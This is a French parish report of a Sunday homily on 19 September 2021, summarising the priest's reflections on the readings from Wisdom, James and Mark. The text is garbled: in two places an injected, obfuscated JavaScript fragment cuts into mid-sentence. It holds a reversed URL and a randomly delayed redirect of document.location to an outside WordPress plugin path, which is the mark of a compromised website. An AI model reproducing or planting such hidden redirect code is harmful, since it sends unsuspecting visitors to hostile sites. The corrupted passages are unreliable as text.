La célébration eucharistique de ce dimanche 19 septembre 2021 au Sanctuaire de la Reine de la Paix et Réconciliation a été présidée par le Père Jean Bosco HABONIMANA, et la Chorale Sainte Famille a aidé dans l’animation du chant liturgique. Les lectures du jour ont été tirées du livre de la Sagesse (2, 12. 17-20), de l’épitre de Saint Jacques (3, 16- 4, 3) et l’Evangile selon saint Marc (9, 30-37).

Après la lecture des textes du jour, le Père HABONIMANA a procédé à la prédication homilétique. Il a d’abord précisé que le Dieu en qui nous croyons est à la fois amour est miséricordieux, et Il veut que nous vivions dans la paix et la joie. D’aucuns se demandent pourquoi il y a tant de difficultés et catastrophes dans ce monde alors que Dieu veut que nous vivions en paix. Des telles interrogations ne devraient pas nous préoccuper car Dieu nous a toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donné la force spirituelle nécessaire pour vivre de telles circonstances, de même qu’il nous gratifié l’intelligence et la liberté de choisir ce qui est bon pour nous. Seulement, des gens qui croient en les devins et des forces du mal peuvent sombrer dans de tels questionnements alors qu’il ne devrait pas être le cas pour des fidèles réellement pratiquants.

Selon Le Père prédicateur, les textes de ce jour nous montrent deux choses : les idées qui nous rendent justes, qui sont la justice, la paix et l’équité et les idées mondaines sont à l’opposé des premières, ce sont celles de la recherche la richesse, l’insécurité et la guerre. Des deux, nous sommes appelés à prendre position pour la première voie, celle des idées qui viennent de Dieu. Le message que nous avons entendu dans la première lecture nous a relaté ce qui s’est passé au premier siècle avant Jésus quand les Juifs étaient partis pour Alexandrie en Egypte.  Auparavant, ces derniers croyaient fermement en un seul Dieu, alors que les Egyptiens ne croyaient pas du tout. Ils étaient convaincus que les personnes qui croyaient en Dieu sont moins intelligents. Les Juifs d’Alexandrie ont à un certain Moment opté pour cette attitude égyptienne. Ceux-là même ont commencé à persécuter leurs frères et sœurs Juifs qui avaient décidé de s’attacher à leur foi.

Le monde que nous habitons actuellement est plein de gens qui persécutent leurs prochains, seulement parce qu’ils croient en Dieu. Ils en arrivent des fois à les renvoyer de leur travail ou à les éliminer physiquement. Qu’il y ait des gens comme telles, cela ne toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doit pas nous faire perdre la foi et l’amour que nous avons en Dieu comme nous le dit Saint Paul dans son épitre aux Romains (8, 35-37), car le Christ est à notre côté pour combattre en notre faveur. Par ailleurs, ce sont les épreuves qui font mûrir notre confiance en Dieu, et le Saint Esprit nous réconforte et nous fortifie sans cesse. De la seconde lecture, saint Jacques nous invite à combattre et lutter contre le désordre qui ne fait qu’engendrer toute forme de mal et des luttes entre les proches et les voisins. Il nous faut plutôt rechercher la sagesse qui vient de Dieu car c’est cela qui nous rend des fils et filles d’un même Dieu et Père tout en faisant de nous des défenseurs de la paix.

De l’Evangile de ce dimanche, Jésus a annoncé à ses disciples sa condamnation, sa passion, sa mort et sa résurrection. Mais quand il leur révélait tout cela, ils étaient occupés à discuter entre eux pour savoir qui était le premier ou le chef entre eux. Jésus en a profité pour les enseigner qu’un chef est celui qui accepte de se mettre au service des autres. En agissant ainsi, nous aurons mérité notre récompense au royaume des cieux comme la Bible nous le dit. Seulement, il ne faut rien faire dans l’hypocrisie, comme le fait de nous saluer et nous parler seulement quand nous venons à la Messe alors que la situation est différente en d’autres circonstances. Prions es uns pour les autres que la grâce de Dieu nous rende fidèle à aux commandements divins jusqu’au jour où nous aurons achevé notre pèlerinage terrestre.

NYANDWI M.